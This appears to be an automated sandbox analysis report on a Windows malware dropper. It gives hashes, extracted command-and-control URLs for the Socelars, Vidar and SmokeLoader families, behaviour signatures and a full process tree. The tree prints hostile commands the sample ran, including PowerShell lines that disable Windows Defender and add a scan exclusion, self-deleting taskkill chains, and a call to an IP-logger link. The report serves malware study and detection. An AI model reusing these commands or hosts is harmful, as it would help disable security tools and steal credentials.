Analysis

  • max time kernel
    128s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20/12/2021, 14:04

General

  • Target

    1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098.exe

  • Size

    7.1MB

  • MD5

    d866d58ec1615ca95161e0f83c13dd73

  • SHA1

    258f6d8adaa4f6fad03a603c6a034b40cf731558

  • SHA256

    1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098

  • SHA512

    bc557b5c8ea1999aa101de52f23401b83b8d7c09990582cab9a17110ced814149101084b8e98948d81b401cc6e7b34a128930a860449b4378f5216a23a78cf3e

Malware Config

Extracted

Family

socelars

C2

http://www.biohazardgraphics.com/

Extracted

Family

vidar

Version

49.1

Botnet

915

C2

https://noc.social/@sergeev46

https://c.im/@sergeev47

Attributes
  • profile_id

    915

Extracted

Family

smokeloader

Version

2020

C2

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 19 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:896
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:3024
    • C:\Users\Admin\AppData\Local\Temp\1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098.exe
      "C:\Users\Admin\AppData\Local\Temp\1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:676
      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\setup_install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          3⤵
            PID:1540
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1604
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            3⤵
              PID:1380
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:744
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sat04e9d8f172e50.exe /mixtwo
              3⤵
              • Loads dropped DLL
              PID:844
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04e9d8f172e50.exe
                Sat04e9d8f172e50.exe /mixtwo
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                PID:856
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04e9d8f172e50.exe
                  Sat04e9d8f172e50.exe /mixtwo
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1680
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat04e9d8f172e50.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04e9d8f172e50.exe" & exit
                    6⤵
                      PID:2208
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im "Sat04e9d8f172e50.exe" /f
                        7⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2296
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat0475667e2de8c3.exe
                3⤵
                • Loads dropped DLL
                PID:1332
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0475667e2de8c3.exe
                  Sat0475667e2de8c3.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1712
                  • C:\Users\Admin\AppData\Local\4e34fab2-19db-4444-827b-3a0099f2ab2a.exe
                    "C:\Users\Admin\AppData\Local\4e34fab2-19db-4444-827b-3a0099f2ab2a.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1648
                  • C:\Users\Admin\AppData\Local\45b41dad-d692-4ff1-bdf2-f8e009d1fe35.exe
                    "C:\Users\Admin\AppData\Local\45b41dad-d692-4ff1-bdf2-f8e009d1fe35.exe"
                    5⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:980
                    • C:\Users\Admin\AppData\Roaming\50807429\1733410217334102.exe
                      "C:\Users\Admin\AppData\Roaming\50807429\1733410217334102.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1720
                  • C:\Users\Admin\AppData\Local\cb793e72-0c44-4685-b0da-c9e7b83649e5.exe
                    "C:\Users\Admin\AppData\Local\cb793e72-0c44-4685-b0da-c9e7b83649e5.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:2516
                  • C:\Users\Admin\AppData\Local\a0860072-effc-4d87-8899-64bbab380817.exe
                    "C:\Users\Admin\AppData\Local\a0860072-effc-4d87-8899-64bbab380817.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2752
                  • C:\Users\Admin\AppData\Local\5585ca05-db7c-4475-a217-7678d6765a74.exe
                    "C:\Users\Admin\AppData\Local\5585ca05-db7c-4475-a217-7678d6765a74.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2896
                    • C:\Users\Admin\AppData\Roaming\4243265.exe
                      "C:\Users\Admin\AppData\Roaming\4243265.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:3032
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat04d99657076.exe
                3⤵
                • Loads dropped DLL
                PID:2020
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04d99657076.exe
                  Sat04d99657076.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:980
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat049b33b1be29125.exe
                3⤵
                • Loads dropped DLL
                PID:636
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat049b33b1be29125.exe
                  Sat049b33b1be29125.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1552
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 860
                    5⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2388
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat047cc0debc59.exe
                3⤵
                • Loads dropped DLL
                PID:1852
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat047cc0debc59.exe
                  Sat047cc0debc59.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:776
                  • C:\Users\Admin\AppData\Local\Temp\is-IKTQ4.tmp\Sat047cc0debc59.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-IKTQ4.tmp\Sat047cc0debc59.tmp" /SL5="$5011C,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat047cc0debc59.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1000
                    • C:\Users\Admin\AppData\Local\Temp\is-OSKS2.tmp\Tougay.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-OSKS2.tmp\Tougay.exe" /S /UID=91
                      6⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      PID:2592
                      • C:\Users\Admin\AppData\Local\Temp\e7-f4e05-8cc-deeb2-aa8fd5fe59991\Sohaezhihisy.exe
                        "C:\Users\Admin\AppData\Local\Temp\e7-f4e05-8cc-deeb2-aa8fd5fe59991\Sohaezhihisy.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2040
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          8⤵
                            PID:1384
                        • C:\Users\Admin\AppData\Local\Temp\88-bb2b0-0bf-25da5-336a712fdeb2f\Tekiqulezhu.exe
                          "C:\Users\Admin\AppData\Local\Temp\88-bb2b0-0bf-25da5-336a712fdeb2f\Tekiqulezhu.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:1196
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1rpHg7
                          7⤵
                            PID:1224
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04951cf2a61625.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1708
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04cf04f0504c7.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1736
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04091e9a4f.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1480
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat0413d2f09b96ff.exe
                    3⤵
                    • Loads dropped DLL
                    PID:556
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04efd3813d34d2686.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1456
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04582c0a08.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1256
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat0448d9fa84aca6c1.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1964
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat0440a840bf678986a.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1016
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat045fe73e29fa5e0b2.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1836
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0448d9fa84aca6c1.exe
                Sat0448d9fa84aca6c1.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:1084
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0448d9fa84aca6c1.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0448d9fa84aca6c1.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2132
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04091e9a4f.exe
                Sat04091e9a4f.exe
                1⤵
                • Executes dropped EXE
                PID:1620
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04efd3813d34d2686.exe
                Sat04efd3813d34d2686.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1768
                • C:\Windows\SysWOW64\control.exe
                  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\1S3Y.CPl",
                  2⤵
                    PID:2528
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\1S3Y.CPl",
                      3⤵
                        PID:2636
                  • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe
                    Sat04cf04f0504c7.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1840
                    • C:\Users\Admin\AppData\Local\Temp\is-9GED9.tmp\Sat04cf04f0504c7.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-9GED9.tmp\Sat04cf04f0504c7.tmp" /SL5="$10178,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:1976
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe" /SILENT
                        3⤵
                        • Executes dropped EXE
                        PID:1660
                  • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat045fe73e29fa5e0b2.exe
                    Sat045fe73e29fa5e0b2.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1100
                    • C:\Windows\SysWOW64\control.exe
                      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\JQOzcH.CPL",
                      2⤵
                        PID:2520
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JQOzcH.CPL",
                          3⤵
                            PID:2628
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04951cf2a61625.exe
                        Sat04951cf2a61625.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1716
                        • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04951cf2a61625.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04951cf2a61625.exe" -u
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:1748
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0413d2f09b96ff.exe
                        Sat0413d2f09b96ff.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Modifies system certificate store
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1760
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1440
                          2⤵
                          • Program crash
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2420
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04582c0a08.exe
                        Sat04582c0a08.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1872
                        • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04582c0a08.exe
                          C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04582c0a08.exe
                          2⤵
                          • Executes dropped EXE
                          PID:2012
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0440a840bf678986a.exe
                        Sat0440a840bf678986a.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:1092
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im Sat0440a840bf678986a.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0440a840bf678986a.exe" & del C:\ProgramData\*.dll & exit
                          2⤵
                            PID:2764
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im Sat0440a840bf678986a.exe /f
                              3⤵
                              • Kills process with taskkill
                              PID:1184
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              3⤵
                              • Delays execution with timeout.exe
                              PID:932
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                          1⤵
                          • Process spawned unexpected child process
                          PID:2900
                          • C:\Windows\SysWOW64\rundll32.exe
                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                            2⤵
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2960

                        Network

                              MITRE ATT&CK Enterprise v6

                              Downloads
